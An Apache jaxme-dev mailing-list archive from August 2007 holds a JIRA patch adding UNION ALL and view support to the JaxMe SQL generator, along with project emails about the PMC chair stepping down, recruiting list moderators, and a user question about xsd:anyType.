=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D > --- D:/projekte/justus/ws-jaxme-0.5.3-SNAPSHOT/src/js/org/apache/ws/jaxme= /sqls/impl/SQLGeneratorImpl.java=09(revision 567598) > +++ D:/projekte/justus/ws-jaxme-0.5.3-SNAPSHOT/src/js/org/apache/ws/jaxme= /sqls/impl/SQLGeneratorImpl.java=09(working copy) > @@ -592,6 +592,9 @@ > if (t instanceof ViewImpl) { > ViewImpl v =3D (ViewImpl) t; > tableName =3D "(" + getSelectQuery(v.getViewStatement(), pDa= ta) + ")"; > + } else if (t instanceof SelectCombinationViewImpl) { > + =09SelectCombinationViewImpl view =3D (SelectCombinationViewImpl= ) t; > + =09tableName =3D "(" + getQuery(view.getSelectCombinationStateme= nt()) + ")"; > } else { > tableName =3D pTable.getTable().getQName(); > } > @@ -1034,6 +1037,11 @@ > checkSameStructure(first, other); > sb.append(' '); > sb.append(pSep); > + if(pStatement instanceof UnionStatement) { > + =09if(((UnionStatement)pStatement).isAll(other)){ > + sb.append(" ALL"); > + =09} > + }; > sb.append(" ("); > sb.append(getQuery(other)); > sb.append(')'); > @@ -1052,9 +1060,7 @@ > } else if (pStatement instanceof SelectStatement) { > s =3D getSelectQuery((SelectStatement) pStatement); > } else if (pStatement instanceof UnionStatement) { > - final UnionStatement us =3D (UnionStatement) pStatement; > - final boolean all =3D us.isAll(); > - s =3D getSelectCombinationStatement(us, all ? "UNION ALL" : = "UNION"); > + s =3D getSelectCombinationStatement((UnionStatement) pStatem= ent, "UNION"); > } else if (pStatement instanceof IntersectionStatement) { > s =3D getSelectCombinationStatement((IntersectionStatement) = pStatement, "INTERSECT"); > } else if (pStatement instanceof MinusStatement) { > Index: D:/projekte/justus/ws-jaxme-0.5.3-SNAPSHOT/src/js/org/apache/ws/ja= xme/sqls/impl/UnionStatementImpl.java > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D > --- D:/projekte/justus/ws-jaxme-0.5.3-SNAPSHOT/src/js/org/apache/ws/jaxme= /sqls/impl/UnionStatementImpl.java=09(revision 567598) > +++ D:/projekte/justus/ws-jaxme-0.5.3-SNAPSHOT/src/js/org/apache/ws/jaxme= /sqls/impl/UnionStatementImpl.java=09(working copy) > @@ -1,6 +1,9 @@ > package org.apache.ws.jaxme.sqls.impl; > =20 > +import java.util.HashMap; > + > import org.apache.ws.jaxme.sqls.SQLFactory; > +import org.apache.ws.jaxme.sqls.SelectStatement; > import org.apache.ws.jaxme.sqls.UnionStatement; > =20 > =20 > @@ -8,17 +11,28 @@ > * Default implementation of {@link UnionStatement}. > */ > public class UnionStatementImpl extends SelectCombinationStatementImpl i= mplements UnionStatement { > - private boolean all; > - =20 > +=09private final HashMap all =3D new HashMap();=20 > +=09private boolean first =3D true; > +=09 > protected UnionStatementImpl(SQLFactory pFactory) { > super(pFactory); > } > =20 > - public boolean isAll() { > - return all; > - } > +=09public void addStatement(SelectStatement statement, boolean pAll) { > +=09=09if(first && pAll){ > +=09=09=09throw new IllegalArgumentException(" pAll=3Dtrue for first Stat= ement is not allowed"); > +=09=09} > +=09=09super.addStatement(statement); > +=09=09all.put(statement,new Boolean(pAll)); > +=09=09first =3D false; > +=09} > +=09 > +=09public void addStatement(SelectStatement statement) { > +=09=09addStatement(statement,false); > +=09} > =20 > - public void setAll(boolean pAll) { > - all =3D pAll; > - } > +=09public boolean isAll(SelectStatement statement) { > +=09=09return ((Boolean)all.get(statement)).booleanValue(); > +=09} > + > } > Index: D:/projekte/justus/ws-jaxme-0.5.3-SNAPSHOT/src/js/org/apache/ws/ja= xme/sqls/SelectCombinationStatement.java > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D > --- D:/projekte/justus/ws-jaxme-0.5.3-SNAPSHOT/src/js/org/apache/ws/jaxme= /sqls/SelectCombinationStatement.java=09(revision 567598) > +++ D:/projekte/justus/ws-jaxme-0.5.3-SNAPSHOT/src/js/org/apache/ws/jaxme= /sqls/SelectCombinationStatement.java=09(working copy) > @@ -7,10 +7,9 @@ > * Common base interface for {@link UnionStatement}, and > * {@link IntersectionStatement}. > */ > -public interface SelectCombinationStatement extends Statement { > +public interface SelectCombinationStatement extends Statement, ViewableS= tatement { > /** > - * Adds a select statement to the given "union", or > - * "intersection" statement. > + * Adds a select statement to the given "union", "intersection", or = "minus" statement. > */ > void addStatement(SelectStatement pStatement); > =20 > @@ -18,4 +17,5 @@ > * Returns an iterator over all the select statements. > */ > Iterator getSelectStatements(); > + > } > Index: D:/projekte/justus/ws-jaxme-0.5.3-SNAPSHOT/src/js/org/apache/ws/ja= xme/sqls/ObjectFactory.java > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D > --- D:/projekte/justus/ws-jaxme-0.5.3-SNAPSHOT/src/js/org/apache/ws/jaxme= /sqls/ObjectFactory.java=09(revision 567598) > +++ D:/projekte/justus/ws-jaxme-0.5.3-SNAPSHOT/src/js/org/apache/ws/jaxme= /sqls/ObjectFactory.java=09(working copy) > @@ -16,6 +16,8 @@ > package org.apache.ws.jaxme.sqls; > =20 > import org.apache.ws.jaxme.sqls.Expression.Type; > +import org.apache.ws.jaxme.sqls.Table.Name; > +import org.apache.ws.jaxme.sqls.impl.SelectCombinationStatementImpl; > =20 > =20 > /** A factory object for creating all the objects used by > @@ -46,6 +48,16 @@ > */ > public Table newView(SelectStatement pSelectStatement, Table.Name pN= ame); > =20 > + /** Returns an instance of > + * {@link org.apache.ws.jaxme.sqls.Table}, which allows to embed > + * the given instance of > + * {@link org.apache.ws.jaxme.sqls.SelectCombinationStatement} into = another > + * SELECT statement. > + */ > + public Table newView( > +=09=09=09SelectCombinationStatementImpl selectCombinationStatementImpl, > +=09=09=09Name name); > + > /** Creates a new instance of > * {@link org.apache.ws.jaxme.sqls.Constraint} constraining > * the given {@link org.apache.ws.jaxme.sqls.ConstrainedStatement}. > @@ -64,4 +76,5 @@ > =09/** Creates a new instance of {@link Expression}. > =09 */ > =09public Expression createExpression(Statement pStatement, Type sum); > + > } > Index: D:/projekte/justus/ws-jaxme-0.5.3-SNAPSHOT/src/js/org/apache/ws/ja= xme/sqls/SelectStatement.java > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D > --- D:/projekte/justus/ws-jaxme-0.5.3-SNAPSHOT/src/js/org/apache/ws/jaxme= /sqls/SelectStatement.java=09(revision 567598) > +++ D:/projekte/justus/ws-jaxme-0.5.3-SNAPSHOT/src/js/org/apache/ws/jaxme= /sqls/SelectStatement.java=09(working copy) > @@ -23,7 +23,7 @@ > * > * @author <a href=3D"mailto:[email protected]">Jochen Wiedmann</a> > */ > -public interface SelectStatement extends ConstrainedStatement { > +public interface SelectStatement extends ConstrainedStatement,ViewableSt= atement { > =09/** Provides a single column for an <code>ORDER BY</code> > * clause. > =09 */ > @@ -111,14 +111,4 @@ > */ > public int getSkippedRows(); > =20 > - /** <p>Creates a view, which may be used to embed the statement into > - * a separate query.</p> > - */ > - public Table createView(Table.Name pName); > - > - > - /** <p>Creates a view, which may be used to embed the statement into > - * a separate query.</p> > - */ > - public Table createView(String pName); > } > Index: D:/projekte/justus/ws-jaxme-0.5.3-SNAPSHOT/src/js/org/apache/ws/ja= xme/sqls/junit/CreateTest.java > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D > --- D:/projekte/justus/ws-jaxme-0.5.3-SNAPSHOT/src/js/org/apache/ws/jaxme= /sqls/junit/CreateTest.java=09(revision 567598) > +++ D:/projekte/justus/ws-jaxme-0.5.3-SNAPSHOT/src/js/org/apache/ws/jaxme= /sqls/junit/CreateTest.java=09(working copy) > @@ -458,7 +458,7 @@ > =09=09assertEquals(expect, got); > =09} > =20 > -=09/** Test for UNION and UNION ALL. > +=09/** Test for UNION. > =09 */ > =09public void testUnion() { > UnionStatement us =3D getSQLFactory().newUnionStatement(); > @@ -467,7 +467,23 @@ > String got =3D gen.getQuery(us); > String expect =3D "(SELECT MyIndex, MyName, MyDate FROM MySchema= .MyTable WHERE 'MyIndex'>5) UNION (SELECT MyIndex, MyName, MyDate FROM MySc= hema.MyTable WHERE 'MyName' LIKE 'x%')"; > assertEquals(expect, got); > - us.setAll(true); > +=09} > +=09/** Test for UNION ALL. > +=09 */ > +=09public void testUnionAll() { > + UnionStatement us =3D getSQLFactory().newUnionStatement(); > +=09 Table t =3D getBasicTable(); > +=09=09SelectStatement st1 =3D t.getSelectStatement(); > +=09=09SelectStatement st2 =3D t.getSelectStatement(); > +=09=09BooleanConstraint bc1 =3D st1.getWhere().createGT(); > +=09=09bc1.addPart("MyIndex"); > +=09=09bc1.addPart(5); > +=09=09BooleanConstraint bc2 =3D st2.getWhere().createLIKE(); > +=09=09bc2.addPart("MyName"); > +=09=09bc2.addPart("x%"); > +=09=09us.addStatement(st1); > +=09=09us.addStatement(st2,true); > + SQLGenerator gen =3D getSQLGenerator(); > String gotAll =3D gen.getQuery(us); > String expectAll =3D "(SELECT MyIndex, MyName, MyDate FROM MySch= ema.MyTable WHERE 'MyIndex'>5) UNION ALL (SELECT MyIndex, MyName, MyDate FR= OM MySchema.MyTable WHERE 'MyName' LIKE 'x%')"; > assertEquals(expectAll, gotAll); > @@ -516,4 +532,21 @@ > // Ok > } > } > + > +=09/** Test for UNION and UNION ALL. > +=09 */ > +=09public void testUnionView() { > + UnionStatement us =3D getSQLFactory().newUnionStatement(); > +=09 createSelectCombinationStatement(us); > +=09 Table view =3D us.createView((String)null); > +=09 // SelectStatemnt st =3D SELECT * FROM view ... > +=09 SelectStatement st =3D getSQLFactory().newSelectStatement(); > +=09 st.setTable(view); > +=09 =20 > +=09 SQLGenerator gen =3D getSQLGenerator(); > + String got =3D gen.getQuery(st); > + String expect =3D "SELECT * FROM ((SELECT MyIndex, MyName, MyDat= e FROM MySchema.MyTable WHERE 'MyIndex'>5) UNION (SELECT MyIndex, MyName, M= yDate FROM MySchema.MyTable WHERE 'MyName' LIKE 'x%'))"; > + assertEquals(expect, got); > +=09} > + > } > Index: D:/projekte/justus/ws-jaxme-0.5.3-SNAPSHOT/src/js/org/apache/ws/ja= xme/sqls/UnionStatement.java > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D > --- D:/projekte/justus/ws-jaxme-0.5.3-SNAPSHOT/src/js/org/apache/ws/jaxme= /sqls/UnionStatement.java=09(revision 567598) > +++ D:/projekte/justus/ws-jaxme-0.5.3-SNAPSHOT/src/js/org/apache/ws/jaxme= /sqls/UnionStatement.java=09(working copy) > @@ -6,14 +6,15 @@ > */ > public interface UnionStatement extends SelectCombinationStatement { > /** > + * Adds a select statement to the given "union", "intersection", or = "minus" statement. > * Sets, whether this is a "union all" statement. By default, > * it isn't. > */ > - void setAll(boolean pAll); > - > + void addStatement(SelectStatement pStatement,boolean all); > + =20 > /** > - * Returns, whether this is a "union all" statement. By default, > - * it isn't. > + * is 'union all' Statement > */ > - boolean isAll(); > + boolean isAll(SelectStatement pStatement); > + > } > Index: D:/projekte/justus/ws-jaxme-0.5.3-SNAPSHOT/src/js/org/apache/ws/ja= xme/sqls/ViewableStatement.java > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D > --- D:/projekte/justus/ws-jaxme-0.5.3-SNAPSHOT/src/js/org/apache/ws/jaxme= /sqls/ViewableStatement.java=09(revision 0) > +++ D:/projekte/justus/ws-jaxme-0.5.3-SNAPSHOT/src/js/org/apache/ws/jaxme= /sqls/ViewableStatement.java=09(revision 0) > @@ -0,0 +1,18 @@ > +package org.apache.ws.jaxme.sqls; > + > +/** > + * this interface describe the potential use as view for a statement > + */ > +public interface ViewableStatement { > + > +=09/** <p>Creates a view, which may be used to embed the statement into > +=09 * a separate query.</p> > +=09 */ > +=09public abstract Table createView(Table.Name pName); > + > +=09/** <p>Creates a view, which may be used to embed the statement into > +=09 * a separate query.</p> > +=09 */ > +=09public abstract Table createView(String pName); > + > +} > \ No newline at end of file --=20 This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Mon Aug 20 14:23:15 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 29466 invoked from network); 20 Aug 2007 14:22:30 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 20 Aug 2007 14:22:30 -0000 Received: (qmail 89694 invoked by uid 500); 20 Aug 2007 14:21:57 -0000 Delivered-To: [email protected] Received: (qmail 89654 invoked by uid 500); 20 Aug 2007 14:21:57 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jaxme-dev.ws.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 89552 invoked by uid 99); 20 Aug 2007 14:21:56 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 20 Aug 2007 07:21:56 -0700 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO nz-out-0506.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 20 Aug 2007 14:22:17 +0000 Received: by nz-out-0506.google.com with SMTP id l1so410295nzf for <[email protected]>; Mon, 20 Aug 2007 07:21:24 -0700 (PDT) DKIM-Signature: a=rsa-sha1; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:reply-to:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition; b=Xhs6Ipr8dByat7hFChow9qjPLT+teJmacha5DzcueQxK5310I4SYDWjZxnIAnO7A8vp01wEti807c9YGukkbUWlyqKBz8g7aNox2ZamQ/Vp4Wd66fOj2dFnnNhEop/B0Z2NkzJHDGWwnYlSCa+CLl7vaC+4VYTuzTedSHa2k3nw= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:reply-to:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition; b=uVVwGMUyG6NbsyZUvxrzfcKt/ahdwaYKlyfLbWo6J7Rz8Mt5h05ZR47T1RlOH6TxfU7P7MYvy650L3sGJXxO3nhGhaznbdG5OLUByulmqWUJTRqrGNNhisxBOHdbNX9Uaso3lE/yZLxd09Uz8El2QymrttDLKZ5wF/e8dt8HReY= Received: by 161.129.204.104 with SMTP id f1mr775840wae.1187619683152; Mon, 20 Aug 2007 07:21:23 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Mon, 20 Aug 2007 07:21:23 -0700 (PDT) Message-ID: <[email protected]> Date: Mon, 20 Aug 2007 10:21:23 -0400 From: "Davanum Srinivas" <[email protected]> Reply-To: [email protected] To: "[email protected]" <[email protected]> Subject: Stepping down as PMC chair MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline X-Virus-Checked: Checked by ClamAV on apache.org Dear WS folks, It's been a wild ride since WS PMC inception in 2003 as the PMC chair. I'd like to step down from this role now. Dear PMC folks, Please start the process for nominations for a new PMC chair followed by a VOTE. FYI, There's a board meeting every month (typically the 3rd week). We'd need to draft a resolution and sent it in time for a scheduled board meeting. Thanks! -- dims -- Davanum Srinivas acf:4db6:5e0b:f386:43a5:35d7:718d:3c8b http://davanum.wordpress.com --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Mon Aug 20 14:41:42 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 38406 invoked from network); 20 Aug 2007 14:41:00 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 20 Aug 2007 14:40:59 -0000 Received: (qmail 44887 invoked by uid 500); 20 Aug 2007 14:40:43 -0000 Delivered-To: [email protected] Received: (qmail 44816 invoked by uid 500); 20 Aug 2007 14:40:43 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jaxme-dev.ws.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 44767 invoked by uid 99); 20 Aug 2007 14:40:43 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 20 Aug 2007 07:40:43 -0700 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO rv-out-0910.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 20 Aug 2007 14:40:37 +0000 Received: by rv-out-0910.google.com with SMTP id c24so861221rvf for <[email protected]>; Mon, 20 Aug 2007 07:40:16 -0700 (PDT) DKIM-Signature: a=rsa-sha1; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:reply-to:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition; b=rilDKXxTNZZxJ75h7qg/iy8BS6Q8rJEZOxphpg00GvTSolx/jLuu1lm9gf4kPjv3q9M5GlAb1Gj0Sae24hvQQxEpe6CpR03PzjF4tBdc8zPseDMc09aAn8LowKItfqj3A+nSYvOjVCEi2tm47wxudmsC6oFk0SpnpTN+J1dR9pk= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:reply-to:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition; b=Uuk2leCAl1JM/LTZguYiNZwEJ5uz317z0MmVgjCc2Ot0q4oNV8p3UP+9UgW8NCKvfunjx0wzFOzshBV2bTkGgW90EJA9qnr/1wSban2nklP7+ZdjE1/Ip1kPXozAM2vRdO5QpPFdxH58jUBZKLBUJNXcygE2CU244ezPDRFrHos= Received: by 161.129.204.104 with SMTP id w2mr1181140wae.1187620816404; Mon, 20 Aug 2007 07:40:16 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Mon, 20 Aug 2007 07:40:16 -0700 (PDT) Message-ID: <[email protected]> Date: Mon, 20 Aug 2007 10:40:16 -0400 From: "Davanum Srinivas" <[email protected]> Reply-To: [email protected] To: "[email protected]" <[email protected]> Subject: Need moderators for Mailing lists MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline X-Virus-Checked: Checked by ClamAV on apache.org Folks, [Sorry for the massive cross-post!!!] Anyone who is willing to be moderator for any of the following mailing lists at ws, please drop me an note. axis-c-dev axis-c-user axis-cvs axis-dev axis-tck axis-user-ja axis-user commons-dev general juddi-cvs juddi-dev juddi-user kandula-dev muse-commits muse-dev muse-user sandesha-dev scout-dev synapse-dev synapse-user woden-dev wsif-dev wsif-user wss4j-dev rampart-dev thanks, dims --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Tue Aug 21 16:13:47 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 75426 invoked from network); 21 Aug 2007 16:13:20 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 21 Aug 2007 16:13:20 -0000 Received: (qmail 91068 invoked by uid 500); 21 Aug 2007 16:13:03 -0000 Delivered-To: [email protected] Received: (qmail 91002 invoked by uid 500); 21 Aug 2007 16:13:03 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jaxme-dev.ws.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 90954 invoked by uid 99); 21 Aug 2007 16:13:03 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 21 Aug 2007 09:13:03 -0700 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO wa-out-1112.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 21 Aug 2007 16:13:27 +0000 Received: by wa-out-1112.google.com with SMTP id k22so1260680waf for <[email protected]>; Tue, 21 Aug 2007 09:12:31 -0700 (PDT) DKIM-Signature: a=rsa-sha1; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:reply-to:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition; b=QEnqjkRMpSRZ1/Pb169HKAdta6vaf8xS6Avr1stJvFWsJEKyzN7XBBNLVUzdLTa9oEhqkfE0ZTP/yFKcAWPPROvnYBJ1pz6vh3fyuHXsodwrw37YBLggyfk3Uo7GuhWsuUk4kshZpHYk4EaKN51X68UiqaKzYJoL4Cx8Ci6Mqpw= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:reply-to:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition; b=CLAv03a0PyhPde6JEXLa6N/dbZ06CDA5vGhKYJEbgetzf4bR52qUVGZAwo8lzVXLBSsM3mGqEZoE9EnqL7fNczN754vnPV0goAvoQSXk/LSWrOtT28WV7TvZBZLjChDrBKXLEwZZz6DOsQuL6RAutLBmSoF/tD4K4/ZRbPtcGrY= Received: by 161.129.204.104 with SMTP id o1mr705314wak.1187712750470; Tue, 21 Aug 2007 09:12:30 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Tue, 21 Aug 2007 09:12:30 -0700 (PDT) Message-ID: <[email protected]> Date: Tue, 21 Aug 2007 12:12:30 -0400 From: "Davanum Srinivas" <[email protected]> Reply-To: [email protected] To: "[email protected]" <[email protected]> Subject: Need moderators for Mailing lists - Round #2 MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline X-Virus-Checked: Checked by ClamAV on apache.org Team, Here's the current list of moderators. Please check your email id and the lists that you are responsible for. We use [email protected]. Here's a pointer to a FAQ: http://www.apache.org/dev/committers.html#mail-moderate Any questions regarding mailing lists / moderation can be addressed to [email protected]. Please make sure that the project(s) you work on has adequate # of moderators. thanks, dims ==== announce ==== [email protected] [email protected] [email protected] ==== axis-c-dev ==== [email protected] [email protected] [email protected] ==== axis-c-user ==== [email protected] [email protected] [email protected] ==== axis-cvs ==== [email protected] [email protected] [email protected] ==== axis-dev ==== [email protected] [email protected] [email protected] [email protected] ==== axis-tck ==== [email protected] [email protected] ==== axis-user-ja ==== [email protected] [email protected] [email protected] ==== axis-user ==== [email protected] [email protected] [email protected] ==== commons-dev ==== [email protected] [email protected] [email protected] [email protected] [email protected] ==== general ==== [email protected] [email protected] [email protected] [email protected] [email protected] ==== jaxme-dev ==== [email protected] [email protected] ==== juddi-cvs ==== [email protected] [email protected] ==== juddi-dev ==== [email protected] [email protected] [email protected] [email protected] ==== juddi-user ==== [email protected] [email protected] ==== kandula-dev ==== [email protected] [email protected] ==== muse-commits ==== [email protected] [email protected] ==== muse-dev ==== [email protected] [email protected] ==== muse-user ==== [email protected] [email protected] ==== sandesha-dev ==== [email protected] [email protected] [email protected] ==== scout-dev ==== [email protected] [email protected] ==== synapse-dev ==== [email protected] [email protected] [email protected] ==== synapse-user ==== [email protected] [email protected] [email protected] ==== savan-dev ==== [email protected] ==== tuscany-commits ==== [email protected] [email protected] ==== tuscany-dev ==== [email protected] [email protected] ==== tuscany-user ==== [email protected] [email protected] ==== woden-dev ==== [email protected] [email protected] ==== wsif-dev ==== [email protected] [email protected] [email protected] ==== wsif-user ==== [email protected] [email protected] [email protected] ==== wss4j-dev ==== [email protected] [email protected] ==== xmlrpc-dev ==== [email protected] [email protected] [email protected] ==== xmlrpc-user ==== [email protected] [email protected] [email protected] ==== private ==== [email protected] [email protected] ==== xmlrpc-auto ==== [email protected] [email protected] [email protected] ==== rampart-dev ==== [email protected] [email protected] ==== rampart-c-dev ==== [email protected] [email protected] [email protected] --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Tue Aug 28 08:27:45 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 86713 invoked from network); 28 Aug 2007 08:27:45 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 28 Aug 2007 08:27:45 -0000 Received: (qmail 11777 invoked by uid 500); 28 Aug 2007 08:27:40 -0000 Delivered-To: [email protected] Received: (qmail 11675 invoked by uid 500); 28 Aug 2007 08:27:40 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jaxme-dev.ws.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 11666 invoked by uid 99); 28 Aug 2007 08:27:40 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 28 Aug 2007 01:27:40 -0700 X-ASF-Spam-Status: No, hits=2.0 required=10.0 tests=HTML_MESSAGE,MISSING_MID,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: local policy) Received: from [161.129.204.104] (HELO rock.ciklum.net) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 28 Aug 2007 08:27:35 +0000 Received: from skywalker.ciklum.net ([161.129.204.104] helo=pcdbe) by rock.ciklum.net with esmtpsa (TLSv1:RC4-MD5:128) id 1IPwXK-0001Ag-Vf for [email protected]; Tue, 28 Aug 2007 11:34:59 +0300 From: "Denis Bessmertnyj" <[email protected]> To: <[email protected]> Subject: anyType Date: Tue, 28 Aug 2007 11:27:14 +0300 Organization: Ciklum (Release) MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0101_01C7E966.620EEDB0" X-Mailer: Microsoft Office Outlook, Build 11.0.5510 Thread-Index: AcfpTTyeTDkxtaR7S66Yxmh60H9Cow== X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.3138 X-SA-Do-Not-Run: Yes X-SA-Exim-Connect-IP: 161.129.204.104 X-SA-Exim-Mail-From: [email protected] X-SA-Exim-Scanned: No (on rock.ciklum.net); SAEximRunCond expanded to false X-Virus-Checked: Checked by ClamAV on apache.org Message-Id: <[email protected]> ------=_NextPart_000_0101_01C7E966.620EEDB0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Hi, I cannot understand, how I may have xsd:anyType functionality in my schema. What I need to use for your compiler working properly? - Denis ------=_NextPart_000_0101_01C7E966.620EEDB0 